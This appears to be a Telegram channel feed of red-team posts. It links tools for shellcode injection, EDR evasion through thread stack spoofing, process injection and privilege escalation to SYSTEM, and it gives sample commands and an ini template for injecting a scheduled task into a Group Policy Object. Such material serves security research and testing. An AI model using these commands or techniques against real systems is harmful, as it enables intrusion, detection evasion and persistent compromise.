Shellcode Injection Techniques
A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload.
https://github.com/plackyhacker/Shellcode-Injection-Techniques
#inject #shellcode #csharp
A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload.
https://github.com/plackyhacker/Shellcode-Injection-Techniques
#inject #shellcode #csharp
GitHub
GitHub - plackyhacker/Shellcode-Injection-Techniques: A collection of C# shellcode injection techniques. All techniques use an…
A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some ...
Thread Stack Spoofing
A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
https://github.com/mgeeky/ThreadStackSpoofer
#stackspoofing #av #evasion #inject #shellcode #bypass #edr
A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory.
https://github.com/mgeeky/ThreadStackSpoofer
#stackspoofing #av #evasion #inject #shellcode #bypass #edr
GitHub
GitHub - mgeeky/ThreadStackSpoofer: Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better…
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts. - mgeeky/ThreadStackSpoofer
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
⚔️ Remote Code Injection by Abusing CreateProcess and GetEnvironmentVariable
New method of injecting code into a remote process without using WriteProcessMemory.
CreateProcess:
https://www.x86matthew.com/view_post?id=proc_env_injection
GetEnvironmentVariable:
https://x-c3ll.github.io/posts/GetEnvironmentVariable-Process-Injection/
#maldev #process #inject #pinvoke #winapi
New method of injecting code into a remote process without using WriteProcessMemory.
CreateProcess:
https://www.x86matthew.com/view_post?id=proc_env_injection
GetEnvironmentVariable:
https://x-c3ll.github.io/posts/GetEnvironmentVariable-Process-Injection/
#maldev #process #inject #pinvoke #winapi
👍5
Office Injector - Invokes an RPC method in OfficeClickToRun service that will inject a DLL into a suspended process running as NT AUTHORITY\SYSTEM launched by the task scheduler service, thus achieving privilege escalation from administrator to SYSTEM.
Shim Injector - Writes an undocumented shim data structure into the memory of another process that causes apphelp.dll to apply the “Inject Dll” fix on the process without registering a new SDB file on the system, or even writing such file to disk.
DefCon Presentation
🔗 Source:
https://github.com/deepinstinct/ShimMe
#windows #office #rpc #inject #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5
Forwarded from Whitehat Lab
GitHub
GitHub - synacktiv/GroupPolicyBackdoor: Group Policy Objects manipulation and exploitation framework
Group Policy Objects manipulation and exploitation framework - synacktiv/GroupPolicyBackdoor
Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на
Впервые представлена на DEFCON 33
Примеры:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'
#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Пример ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer
[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"
[MODULEFILTERS]
filters =
[{
"operator": "AND",
"type": "Computer Name",
"value": "ad01-srv1.corp.com"
}]
GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs
#gpo #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍5🔥4🤔1